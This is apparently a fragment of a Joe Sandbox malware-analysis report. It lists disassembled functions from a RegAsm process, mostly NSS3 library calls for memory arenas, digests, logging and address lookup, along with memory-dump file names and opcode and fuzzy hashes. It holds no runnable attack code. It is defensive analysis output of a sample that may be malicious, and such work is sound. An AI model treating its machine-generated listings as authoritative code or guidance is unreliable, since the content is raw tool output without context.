                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitH_prologProcessstrtok_s
                                                                                • String ID: block
                                                                                • API String ID: 3745986650-2199623458
                                                                                • Opcode ID: 13831a635ab857e38a93760726639843a5c721726f6ccf8ed6f7a59b1ebdf2e0
                                                                                • Instruction ID: 11727e29856bce48e5725168b056cd054f1503323e09992035e8e95d40e30adb
                                                                                • Opcode Fuzzy Hash: 13831a635ab857e38a93760726639843a5c721726f6ccf8ed6f7a59b1ebdf2e0
                                                                                • Instruction Fuzzy Hash: F541E574A40312EADB109FF1EC45BEB37ACBB05B44B60443FFA07D2560E77899808B18
                                                                                Function 6C928E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C928E01,00000000,6C929060,6CA30B64), ref: 6C928E7B
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C928E01,00000000,6C929060,6CA30B64), ref: 6C928E9E
                                                                                • PORT_ArenaAlloc_Util.NSS3(6CA30B64,00000001,?,?,?,?,6C928E01,00000000,6C929060,6CA30B64), ref: 6C928EAD
                                                                                • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C928E01,00000000,6C929060,6CA30B64), ref: 6C928EC3
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C928E01,00000000,6C929060,6CA30B64), ref: 6C928ED8
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C928E01,00000000,6C929060,6CA30B64), ref: 6C928EE5
                                                                                • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C928E01), ref: 6C928EFB
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CA30B64,6CA30B64), ref: 6C928F11
                                                                                • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C928F3F
                                                                                  • Part of subcall function 6C92A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C92A421,00000000,00000000,6C929826), ref: 6C92A136
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C92904A
                                                                                Strings
                                                                                • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C928E76
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                • API String ID: 977052965-1032500510
                                                                                • Opcode ID: 4d21d0f8e2aacf0a38b19e1705d3de3237f82a2f2f13d27768b405d975f7a2a4
                                                                                • Instruction ID: d5d8224d92138ec65fd3042a98915b75ccd5cb275a8d2e63f2b065de68a05534
                                                                                • Opcode Fuzzy Hash: 4d21d0f8e2aacf0a38b19e1705d3de3237f82a2f2f13d27768b405d975f7a2a4
                                                                                • Instruction Fuzzy Hash: CD61C0B5D1020A9BDB14CF55CC80AAFB7B9FFA8358F154028DC58A7704E73AE915CBA0
                                                                                Function 6C8D8E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8D8E5B
                                                                                • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C8D8E81
                                                                                • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C8D8EED
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CA018D0,?), ref: 6C8D8F03
                                                                                • PR_CallOnce.NSS3(6CA32AA4,6C9312D0), ref: 6C8D8F19
                                                                                • PL_FreeArenaPool.NSS3(?), ref: 6C8D8F2B
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C8D8F53
                                                                                • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C8D8F65
                                                                                • PL_FinishArenaPool.NSS3(?), ref: 6C8D8FA1
                                                                                • SECITEM_DupItem_Util.NSS3(?), ref: 6C8D8FFE
                                                                                • PR_CallOnce.NSS3(6CA32AA4,6C9312D0), ref: 6C8D9012
                                                                                • PL_FreeArenaPool.NSS3(?), ref: 6C8D9024
                                                                                • PL_FinishArenaPool.NSS3(?), ref: 6C8D902C
                                                                                • PORT_DestroyCheapArena.NSS3(?), ref: 6C8D903E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                • String ID: security
                                                                                • API String ID: 3512696800-3315324353
                                                                                • Opcode ID: 5b53ede5ca559156267cc5244014b8e135bc1f6fbd12fe20ea8fbd1d45e48982
                                                                                • Instruction ID: e585e453d19f77bc33c201399662879aee288ad72d6184eabfc4489f0f10a1d3
                                                                                • Opcode Fuzzy Hash: 5b53ede5ca559156267cc5244014b8e135bc1f6fbd12fe20ea8fbd1d45e48982
                                                                                • Instruction Fuzzy Hash: 935149B1908300ABD7205A199D41FAF73E8AB9575CF461C2EF55897B40D731F908C793
                                                                                Function 6C904E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C904E83
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C904EB8
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C904EC7
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C904EDD
                                                                                • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C904F0B
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C904F1A
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C904F30
                                                                                • PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C904F4F
                                                                                • PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C904F68
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
                                                                                • API String ID: 1003633598-3530272145
                                                                                • Opcode ID: dc393ebd464ea3c1e05c3a88f41b001db39062eb081ab0c1d9737a9106103a7d
                                                                                • Instruction ID: 955c4c77eba57686731c545d225e83ed527469708779445f11996d00e49924bb
                                                                                • Opcode Fuzzy Hash: dc393ebd464ea3c1e05c3a88f41b001db39062eb081ab0c1d9737a9106103a7d
                                                                                • Instruction Fuzzy Hash: CD411131701205ABDB118F54DD88F9A77B5AFB631DF088428E90897A12CB34D95ACFA2
                                                                                Function 6C904CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C904CF3
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C904D28
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C904D37
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C904D4D
                                                                                • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C904D7B
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C904D8A
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C904DA0
                                                                                • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C904DBC
                                                                                • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C904E20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                • API String ID: 1003633598-3553622718
                                                                                • Opcode ID: 6365833a11993c24cb00faca76c90a63ff660e3dc1261b0d105056cee0d927fe
                                                                                • Instruction ID: 07ba73f8899dd5e98cd4532a6969f80b4571e04e41e35dd71f8e1bd06b5969c4
                                                                                • Opcode Fuzzy Hash: 6365833a11993c24cb00faca76c90a63ff660e3dc1261b0d105056cee0d927fe
                                                                                • Instruction Fuzzy Hash: 7C412771700205AFD7159F50DD98B6A77B9EFB630DF048428E80CABA12DB34D84ADF92
                                                                                Function 6C99CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C99CC7B), ref: 6C99CD7A
                                                                                  • Part of subcall function 6C99CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C90C1A8,?), ref: 6C99CE92
                                                                                • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C99CDA5
                                                                                • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C99CDB8
                                                                                • PR_UnloadLibrary.NSS3(00000000), ref: 6C99CDDB
                                                                                • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C99CD8E
                                                                                  • Part of subcall function 6C8C05C0: PR_EnterMonitor.NSS3 ref: 6C8C05D1
                                                                                  • Part of subcall function 6C8C05C0: PR_ExitMonitor.NSS3 ref: 6C8C05EA
                                                                                • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C99CDE8
                                                                                • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C99CDFF
                                                                                • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C99CE16
                                                                                • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C99CE29
                                                                                • PR_UnloadLibrary.NSS3(00000000), ref: 6C99CE48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                • API String ID: 601260978-871931242
                                                                                • Opcode ID: 32599ae020911ff040bf37167ecc9c0d0d3d09d900bcaf880bef34bc0069212a
                                                                                • Instruction ID: 4a3e7bf28bc6bd884d84451cee0d3c0b752433b982ac607d7fec9f1c0df93e74
                                                                                • Opcode Fuzzy Hash: 32599ae020911ff040bf37167ecc9c0d0d3d09d900bcaf880bef34bc0069212a
                                                                                • Instruction Fuzzy Hash: 8211DAE5F1221157E7216BB57E14EEA385C6B1218DF1C4934F909E1F10FB20C94982F3
                                                                                Function 6C936CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CA01DE0,?), ref: 6C936CFE
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C936D26
                                                                                • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C936D70
                                                                                • PORT_Alloc_Util.NSS3(00000480), ref: 6C936D82
                                                                                • DER_GetInteger_Util.NSS3(?), ref: 6C936DA2
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C936DD8
                                                                                • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C936E60
                                                                                • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C936F19
                                                                                • PK11_DigestBegin.NSS3(00000000), ref: 6C936F2D
                                                                                • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C936F7B
                                                                                • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C937011
                                                                                • PK11_FreeSymKey.NSS3(00000000), ref: 6C937033
                                                                                • free.MOZGLUE(?), ref: 6C93703F
                                                                                • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C937060
                                                                                • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C937087
                                                                                • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C9370AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                • String ID:
                                                                                • API String ID: 2108637330-0
                                                                                • Opcode ID: ed65ab1ac307fe946bd4bf965926a0dad0f183068e2fc8ffe2e0d55adc91fc59
                                                                                • Instruction ID: 35e53631494603f647a09529a694a9fee61dd3c8ee1f32be976dfd2bbdeecc05
                                                                                • Opcode Fuzzy Hash: ed65ab1ac307fe946bd4bf965926a0dad0f183068e2fc8ffe2e0d55adc91fc59
                                                                                • Instruction Fuzzy Hash: CAA14C715082209BEB108F24CC45B6B36A8FB9130CF24993DE96DCBB81E779D869C753
                                                                                Function 6C8FAEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?,?,6C8DAB95,00000000,?,00000000,00000000,00000000), ref: 6C8FAF25
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,6C8DAB95,00000000,?,00000000,00000000,00000000), ref: 6C8FAF39
                                                                                • PR_Unlock.NSS3(?,?,?,6C8DAB95,00000000,?,00000000,00000000,00000000), ref: 6C8FAF51
                                                                                • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C8DAB95,00000000,?,00000000,00000000,00000000), ref: 6C8FAF69
                                                                                • TlsGetValue.KERNEL32 ref: 6C8FB06B
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C8FB083
                                                                                • PR_Unlock.NSS3(?), ref: 6C8FB0A4
                                                                                • TlsGetValue.KERNEL32 ref: 6C8FB0C1
                                                                                • EnterCriticalSection.KERNEL32(00000000), ref: 6C8FB0D9
                                                                                • PR_Unlock.NSS3 ref: 6C8FB102
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8FB151
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8FB182
                                                                                  • Part of subcall function 6C92FAB0: free.MOZGLUE(?,-00000001,?,?,6C8CF673,00000000,00000000), ref: 6C92FAC7
                                                                                • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C8FB177
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C8DAB95,00000000,?,00000000,00000000,00000000), ref: 6C8FB1A2
                                                                                • PR_GetCurrentThread.NSS3(?,?,?,?,6C8DAB95,00000000,?,00000000,00000000,00000000), ref: 6C8FB1AA
                                                                                • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C8DAB95,00000000,?,00000000,00000000,00000000), ref: 6C8FB1C2
                                                                                  • Part of subcall function 6C921560: TlsGetValue.KERNEL32(00000000,?,6C8F0844,?), ref: 6C92157A
                                                                                  • Part of subcall function 6C921560: EnterCriticalSection.KERNEL32(?,?,?,6C8F0844,?), ref: 6C92158F
                                                                                  • Part of subcall function 6C921560: PR_Unlock.NSS3(?,?,?,?,6C8F0844,?), ref: 6C9215B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                • String ID:
                                                                                • API String ID: 4188828017-0
                                                                                • Opcode ID: 43c89fd551d1f9b57c071c9d1744a03c731e0b32a277828b031cd4b0711e33c7
                                                                                • Instruction ID: dc2a7e18812a63c72b60398c27fa4b9ad7e6b4c62f5b951bb63c7366e8aba03a
                                                                                • Opcode Fuzzy Hash: 43c89fd551d1f9b57c071c9d1744a03c731e0b32a277828b031cd4b0711e33c7
                                                                                • Instruction Fuzzy Hash: B3A1E1B1E002069BEF209F68DD41AFE77B4EF19308F144524E818A7711E735E99ACBE1
                                                                                Function 6C94AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C94ADB1
                                                                                  • Part of subcall function 6C92BE30: SECOID_FindOID_Util.NSS3(6C8E311B,00000000,?,6C8E311B,?), ref: 6C92BE44
                                                                                • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C94ADF4
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C94AE08
                                                                                  • Part of subcall function 6C92B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA018D0,?), ref: 6C92B095
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C94AE25
                                                                                • PL_FreeArenaPool.NSS3 ref: 6C94AE63
                                                                                • PR_CallOnce.NSS3(6CA32AA4,6C9312D0), ref: 6C94AE4D
                                                                                  • Part of subcall function 6C854C70: TlsGetValue.KERNEL32(?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854C97
                                                                                  • Part of subcall function 6C854C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854CB0
                                                                                  • Part of subcall function 6C854C70: PR_Unlock.NSS3(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854CC9
                                                                                • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C94AE93
                                                                                • PR_CallOnce.NSS3(6CA32AA4,6C9312D0), ref: 6C94AECC
                                                                                • PL_FreeArenaPool.NSS3 ref: 6C94AEDE
                                                                                • PL_FinishArenaPool.NSS3 ref: 6C94AEE6
                                                                                • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C94AEF5
                                                                                • PL_FinishArenaPool.NSS3 ref: 6C94AF16
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                • String ID: security
                                                                                • API String ID: 3441714441-3315324353
                                                                                • Opcode ID: cd1025577ec3987f5a8a5738c7038cbc93bbe649600d9b62565455956fbd48c0
                                                                                • Instruction ID: c031df0624350e9a59c7505434ec16e4691f822aea2a5690dc498512905c103d
                                                                                • Opcode Fuzzy Hash: cd1025577ec3987f5a8a5738c7038cbc93bbe649600d9b62565455956fbd48c0
                                                                                • Instruction Fuzzy Hash: 2A413BB1D4421067E7208A289C45FAB32A8AFA230CF548535E869D6F41FF39D958C7D3
                                                                                Function 6C8E8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?), ref: 6C8E8E22
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C8E8E36
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6C8E8E4F
                                                                                • calloc.MOZGLUE(00000001,?,?,?), ref: 6C8E8E78
                                                                                • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C8E8E9B
                                                                                • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C8E8EAC
                                                                                • PL_ArenaAllocate.NSS3(?,?), ref: 6C8E8EDE
                                                                                • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C8E8EF0
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6C8E8F00
                                                                                • free.MOZGLUE(?), ref: 6C8E8F0E
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C8E8F39
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6C8E8F4A
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6C8E8F5B
                                                                                • PR_Unlock.NSS3(?), ref: 6C8E8F72
                                                                                • PR_Unlock.NSS3(?), ref: 6C8E8F82
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
